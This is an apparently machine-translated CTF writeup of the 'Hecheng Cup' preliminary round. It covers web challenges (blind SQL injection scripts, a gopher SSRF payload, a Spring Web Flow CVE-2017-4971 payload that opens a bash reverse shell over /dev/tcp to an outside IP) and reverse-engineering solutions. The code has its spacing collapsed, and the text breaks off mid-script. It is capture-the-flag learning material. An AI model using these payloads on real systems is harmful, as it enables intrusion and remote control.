Title: The first 'Hecheng Cup' CTF Cyber Security Challenge - Preliminary Writeup

WEB

1.middle_magic

%0a Bypass the first level and add %23 to the end #

Array bypasses the second level

json weak type comparison

http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST: admin[]=1root_pwd[]=2level_3={'result':0}flag{f03d41bf6c8d55f12324fd57f7a00427}

2.easy_sql_2

Login function, post pass username and password. Try admin, admin weak password login successfully, but the prompt flag is not here. Username tried -1'||'1'%23 and found that it was password error! so it was guessed that the backend should find the corresponding password based on the incoming username. After checking it, it was no longer username error! and then the incoming password was compared with this password after md5, and the same login was successful. Try SQL injection, but bans select, so use table injection. The database name is easy to inject. You can also notify that it is ctf without using table without using regexp, and then start to call the table name. Although tables are filtered, columns are not filtered. You can use information_schema.column to blindly issue table names: mysql8.0, table statement:

Filtered information_schema.table with mysql.innodb_table_stats

admin'/**/and/**/(('ctf','%s',3,4,5,6)=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#Note the flag table fl11aag

Notes for hexadecimal:

import stringimport requestsimport timereq=requests.session()url='http://182.116.62.85:26571/login.php'def hh(): payload='admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#' chars=string.printable.replace('.','').replace('?','').replace('`,'').replace('+','') + '_\{}' result='' for i in range(1,100): for j in range(48,125): data={'username':payload%(i,j),'password':'admin'} rep=req.post(url,data) text=rep.text if 'success' in text: print(j) result +=chr(j) # print((chr(j)),end='') # payload=payload%(chr(j-1)+'%s') print(result) breakhh() or # -*-coding:utf-8-*-import requestsdef bind_sql(): flag='' dic='~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?=;9876543210/-,+*)(%$#!' for i in range(1,1000): f=flag for j in dic: _=flag + j # payload='11'||('ctf',binary'{}',1,2,3,4)(table/**/mysql.innodb_table_stats/**/limit/**/1,1)#'.format(_) #admin,fl11aag payload='11'||(binary'{}')(table/**/ctf.fl11aag/**/limit/**/1,1)#'.format(_) print(payload) data={ 'username': payload, 'password': 'admin' } res=requests.post(url=url, data=data) if 'success' in res.text: if j=='~': flag=flag[:-1] + chr(ord(flag[-1])+1) print(flag) exit() flag +=j print(flag) break if flag==f: break return flagif __name__=='__main__': url='http://182.116.62.85:26571/login.php' result=bind_sql() print(result)

3. easy_sql_1

Gopher hit index, tried admin/admin and found a cookie. After decoding it, it was admin. Testing that there was an error in single quotes, it was injected. Inject admin') and updatexml(1,concat(0x7e,(selectsubstr((selectflagfromflag),1,40))),1)#

Exp:

gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACoo kie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D% 0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A Old login interface, saying it is not inner, so it cannot be done, f12 sees use.php, there is an ssrf in it, use the gopher protocol to post and then log in to adminadmin, find that cookie:this_is_your_cookie=YWRtaW4=, bring the cookie up and find that there is no echo of the post after some attempts, try to inject the cookie, encrypt admin'base64 and fill it in before accessing, directly report an error in the SQL statement, use the SQL-labs library, directly report an error and issue a flag: import requestsfrom urllib.parse import quotedata='''POST/HTTP/1.1Host: 127.0.0.1:80Content-Type: application/x-www-form-urlencodedCookie: this_is_your_cookie=LTEnKXx8dXBkYXRleG1sKDEsY29uY2F0KDEsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZykgZnJvbSBmbGFnKSwxKSwxKSM=;PHPSESSID=susn9dj4f1806v0pl5oiureek1;Content-Length: {}{}''''payload='uname=adminpasswd=admin'length=len(payload)data=data.format(length,payload)data=quote(data,'utf-8')url='http://182.116.62.85:28303/use.php'params={ 'url':'gopher://127.0.0.1:80/_'+data}headers={ 'Cookie':'PHPSESSID=8t4ppbs8ek3l5v5estgbttqtu3'}r=requests.get(url,params=params,headers=headers)print(r.text)

4. spring

The title is CVE-2017-4971-Spring Web Flow remote code execution vulnerability

xman original title:

https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/

After entering the login page, fill in the given account and log in

Then go to the http://ip/hotels/1 page and click Book Hotel

Then fill in the information casually and click the Proceed button to jump to the confirmation page

Click Confirm to catch the packet, enter payload and start listening.

_eventId_confirm=_csrf=bcc5ce94-5277-4064-b5f7-850432e3d2f0_(new+java.lang.ProcessBuilder('bash','-c','bash+-i+%26+/dev/tcp/121.40.134.251/10086+0%261')).start()=vulhub

Then send a packet to wait for the server to connect

Successfully getshell, find the flag.txt file in the root directory, and see the flag

flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

5.easypy

?phpinclude 'utils.php';if (isset($_POST['guess'])) { $guess=(string) $_POST['guess']; if ($guess===$secret) { $message='Congratulations! The flag is: ' . $flag; } else { $message='Wrong. Try Again'; }}if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit('hacker :)');}if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){ exit('hacker :)');}if (isset($_GET['show_source'])) { highlight_file(basename($_SERVER['PHP_SELF'])); exit();}else{ show_source(__FILE__);}? The original title is modified, reference connection: https://www.gem-love.com/ctf/1898.html

Call directly: http://182.116.62.85:21895/index.php/utils.php/%81?show[source

Or /index.php/utils.php/%ff/?show[source

Reverse

1.DesignEachStep

Figure1: mainly uses Arrays.equals to verify the input, directly frida hook: functionmain(){Java.perform(function(){varByteString=Java.use('com.android.okhttp.okio.ByteString');Java.use('java.util.Arrays').equals.overload('[B','[B').implementation=function(x,y){console.log('start.');varresult=this.equals(x,y);console.log('arg:',ByteString.of(x).utf8(),ByteString.of(y).utf8());returnresult;}})}setImmediate(main) Figure2: get flag: flag{DE5_c0mpr355_m@y_c0nfu53}

2.AreYouRich

According to the final balance, it must be greater than 49999999, here is another rc4 encryption, decryption gets the account password.Figure3Figure4: Log in and purchase flag flag: flag{y0u_h@V3_@_107_0f_m0n3y!}

3.petition

There is always XOR, there is one ~ in the middle, and the opposite of 0 is0xff. s=[0x1e,0,7,0xce,0xf9,0x8c,0x88,0xa8,0x52,0x99,0x19,0x15,0x66,0x2e,0xaf,0xf6,0x43,0x2c,0xc9,0xca,0x66,0xaa,0x4c,0,0x25,0xd6,0xff,0x44,0x bd,0x72,0x65,8,0x85,0x12,0x7f,0x13,0x24,0xfc,0x24,0x33,0x23,0x97,0xb2]s1=[0x78,108,0x66,0xa9,0x82,0xb5,0xbe,0xcb,0x64,0xa0,0x2f,0x21,0x50 ,3,0x97,0xc7,0x7b,0x18,0xe4,0xfe,0x55,0x9c,0x7f,0x2d,0x1d,0xb2,0x9a,0x7d,0x90,0x45,0x56,0x6e,0xb2,0x21,0x46,0x2b,0x14,0xca,0x12,0x50,0x1 2,0xea,0xb2]print(len(s))flag=''foriinrange(len(s)):flag+=chr(s[i]^s1[i])print(flag) Or in general, I prefer this kind of question because its flag is checked one by one, so it is of course a very pleasant thing to be able to explode. Back to the main text: IDA load file The program starts executing, saying "%36s", but in fact, you have to enter a full 42 bits, a liar. Going down to start, if you look at the bunch of functions, you will find that each of them looks similar, and then guess whether the flag will be bit-by-bit verification, and a flag corresponds to a function. Debugging and other things are still quite tiring (I won't tell you that I can't understand how flags are checked at all). In order to be lazy, I directly use Unicorn here, patch the places where printf and scanf are called in the start function, and then hook the scanf to ensure that the flag can be input into memory.

This will enable the program's input and verification functions to be run. The following is the Unidbg class I wrote for this program: from unicorn import *from unicorn.x86_const import *from capstone import *import binasciiPetition_base=0x0 # The address of the program loading Petition_stack_base=0x10000 with open('Petition', 'rb') as f: code=f.read()xxx=[b'\x00', b'\x01', b'\x02', b'\x03', b'\x04', b'\x05', b'\x06', b'\x07', b'\x08', b'\x09', b'\x0a', b'\x0b', b'\x0c', b'\x0d', b'\x0e', b'\x0f', b'\x10', b'\x11', b'\x12', b'\x13', b'\x14', b'\x15', b'\x16', b'\x17', b'\x18', b'\x19', b'\x1a', b'\x1b', b'\x1c', b'\x1d', b'\x1e', b'\x1f', b'\x20', b'\x21', b'\x22', b'\x23', b'\x24', b'\x25', b'\x26', b'\x27', b'\x28', b'\x29', b'\x2a', b'\x2b', b'\x2c', b'\x2d', b'\x2e', b'\x2f', b'\x30', b'\x31', b'\x32', b'\x33', b'\x34', b'\x35', b'\x36', b'\x37', b'\x38', b'\x39', b'\x3a', b'\x3b', b'\x3c', b'\x3d', b'\x3e', b'\x3f', b'\x40', b'\x41', b'\x42', b'\x43', b'\x44', b'\x45', b'\x46', b'\x47', b'\x48', b'\x49', b'\x4a', b'\x4b', b'\x4c', b'\x4d', b'\x4e', b'\x4f', b'\x50', b'\x51', b'\x52', b'\x53', b'\x54', b'\x55', b'\x56', b'\x57', b'\x58', b'\x59', b'\x5a', b'\x5b', b'\x5c', b'\x5d', b'\x5e', b'\x5e', b'\x5f', b'\x60', b'\x61', b'\x62', b'\x63', b'\x64',